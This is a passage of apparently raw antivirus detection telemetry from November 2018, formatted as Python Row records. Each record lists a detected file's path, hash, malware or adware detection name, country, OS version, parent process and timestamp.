  Row(detection=Row(filename='tmp002903c9', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002903c9', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:29:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002905df', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002905df', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:32:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ec6e', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ec6e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:07:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b978', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b978', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:19:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290cc1', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290cc1', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:40:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ad56', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ad56', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:06:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002933e7', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002933e7', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:26:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002967e8', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002967e8', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:27:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029344b', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029344b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:26:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023f161', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023f161', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:12:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00295029', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00295029', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:55:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00295098', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00295098', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:55:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002384a4', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp002384a4', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:21:48Z'), dt=datetime.date(2018, 11, 4)),
  ...],
 [Row(detection=Row(filename='updater_zip_res0301_newmm[7].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[7].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[3].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[3].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[4].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[4].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[7].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[7].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[5].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[5].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[4].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[4].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[2].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[2].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[3].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[3].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[2].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[2].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmmb25fimks.exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmmB25FIMKS.exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:24:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmmb25fimks.exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmmB25FIMKS.exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:24:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165341-11251adf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-163706-4CB2CFCA\\AVSCAN-20181101-165341-11251ADF', filesize=10368000, name='TR/Eroyee.f062a6.#M1.#R1'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:53:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[8].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[8].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:26:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[1].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[1].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:37:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dhl invoice notification-awb no 264772786300.msg', filepath='\\\\?\\D:\\Mladen\\Sacuvani email\\Reinstalacija-31.10.2018\\Email-31.10.2018-deleted\\DHL Invoice Notification-AWB NO 264772786300.msg', filesize=448000, name='HEUR/AGEN.1001615.#M1.#R1'), hash='f06413440e338162a5f19dfc3328b2bf96dd39f225a8a08ad8764d50574b8d68', metadata=Row(cmdline=None, country='ME', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:33:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dhl invoice notification-awb no 264772786300.msg', filepath='\\\\?\\D:\\Mladen\\Sacuvani email\\Reinstalacija-31.10.2018\\Email-31.10.2018-deleted\\DHL Invoice Notification-AWB NO 264772786300.msg', filesize=448000, name='HEUR/AGEN.1001615.#M1.#R1'), hash='f06413440e338162a5f19dfc3328b2bf96dd39f225a8a08ad8764d50574b8d68', metadata=Row(cmdline=None, country='ME', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:17:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f0a1e4268e7c9b23965776c74e1128ab68a5bd3a17084034255a67061438d61f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F0A1E4268E7C9B23965776C74E1128AB68A5BD3A17084034255A67061438D61F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f0a1e4268e7c9b23965776c74e1128ab68a5bd3a17084034255a67061438d61f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:48:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='กล้องปุ้ย.exe', filepath='E:\\picture\\กล้องปุ้ย\\กล้องปุ้ย.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='f0a8e9891566739b54cd1b6f3def574f6166830dd10ca844d76704a120dd8104', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:15:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$r3o45l3', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$R3O45L3', filesize=64000, name='VBA/Dldr.Agent.skjle.#M1.#R1'), hash='f150aa908aa923ddefe5a935d2c39ac3752a9b1dbf816f5a680512aebebed9de', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183145-45613fee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-183054-3DAB933E\\AVSCAN-20181101-183145-45613FEE', filesize=64000, name='VBA/Dldr.Agent.skjle.#M1.#R1'), hash='f150aa908aa923ddefe5a935d2c39ac3752a9b1dbf816f5a680512aebebed9de', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:31:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f1c411909506e9f587576ef73bbfc951809168580a4f9c27d062510aa7009c73', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\F1C411909506E9F587576EF73BBFC951809168580A4F9C27D062510AA7009C73', filesize=1920000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='f1c411909506e9f587576ef73bbfc951809168580a4f9c27d062510aa7009c73', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:50:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f2381c85355994cf5b5e4b66d91a11efbc97f4232b868c8a3e07e686bde28bb4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-18\\F2381C85355994CF5B5E4B66D91A11EFBC97F4232B868C8A3E07E686BDE28BB4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f2381c85355994cf5b5e4b66d91a11efbc97f4232b868c8a3e07e686bde28bb4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:33:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tripeaks.exe', filepath='C:\\Program Files\\GameHouse\\AncientTripeaks\\Tripeaks.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='f241c5fe912b94290df3a653e8307377511a911a3dd1dbd1769514e13dac4411', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T06:53:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tripeaks.exe', filepath='C:\\Program Files\\GameHouse\\AncientTripeaks\\Tripeaks.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='f241c5fe912b94290df3a653e8307377511a911a3dd1dbd1769514e13dac4411', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T11:06:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='D:\\01 Instaladores\\Isos\\Combo\\autorun.exe', filesize=6912000, name='TR/Patched.Ren.Gen.#M300.#R3369'), hash='f244cb6d23dfeedc852ac1aafb17405eca59d5612677e2944ac76d296c408cc2', metadata=Row(cmdline=None, country='CU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-01T14:49:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vcredist_x86.exe', filepath='C:\\FILES\\Adobe Illustrator\\payloads\\Microsoft VC 2008 Redist (x86)\\vcredist_x86.exe', filesize=11264000, name='W32/Sality.AT.#M1.#R1'), hash='f2c12529759fabfc415d49233a2e868c06cd0fd6e10fe903ef1046e92dc25720', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:37:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vcredist_x86.exe', filepath='C:\\FILES\\Adobe Illustrator\\payloads\\Microsoft VC 2008 Redist (x86)\\vcredist_x86.exe', filesize=11264000, name='W32/Sality.AT.#M1.#R1'), hash='f2c12529759fabfc415d49233a2e868c06cd0fd6e10fe903ef1046e92dc25720', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:37:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vcredist_x86.exe', filepath='C:\\FILES\\Adobe Illustrator\\payloads\\Microsoft VC 2008 Redist (x86)\\vcredist_x86.exe', filesize=11264000, name='W32/Sality.AT.#M1.#R1'), hash='f2c12529759fabfc415d49233a2e868c06cd0fd6e10fe903ef1046e92dc25720', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:33:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='\\\\?\\D:\\Office2007_Arb\\Office.ar-sa\\dwtrig20.exe', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='f2ffd5f8b1f5bf94dc56f3115a2ed5baf5e7afc428038b42b15e44c09d7ae3d3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:56:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f33b872ff6065b1933e42feb77a79cce291239f63731f6d348a9f23b886879ff', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\F33B872FF6065B1933E42FEB77A79CCE291239F63731F6D348A9F23B886879FF', filesize=960000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='f33b872ff6065b1933e42feb77a79cce291239f63731f6d348a9f23b886879ff', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:24:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='install.html', filepath='\\\\?\\C:\\Program Files\\Adobe\\Adobe InDesign CS3\\Adobe_epic\\Registration\\it_IT\\install.html', filesize=4000, name='W32/Chir.B.#M1.#R1'), hash='f33eace7007d435f8157654d9f34d35067baa8dd1be334a01df3a8542622bf4b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:57:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='osppsvc.exe', filepath='C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE', filesize=4640000, name='TR/Taranis.3608.#M1.#R1'), hash='f342100e2e9001f11fdf93f856b50fa43f9b85d2c6b5706ec0433e77206498da', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1936464, timestamp='2018-11-01T04:50:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f37bd445ff5707df09e0ad9fb4e0150a45a26785690bb7de4639d56d4b486d79', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F37BD445FF5707DF09E0AD9FB4E0150A45A26785690BB7DE4639D56D4B486D79', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f37bd445ff5707df09e0ad9fb4e0150a45a26785690bb7de4639d56d4b486d79', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:49:03Z'), dt=datetime.date(2018, 11, 1)),
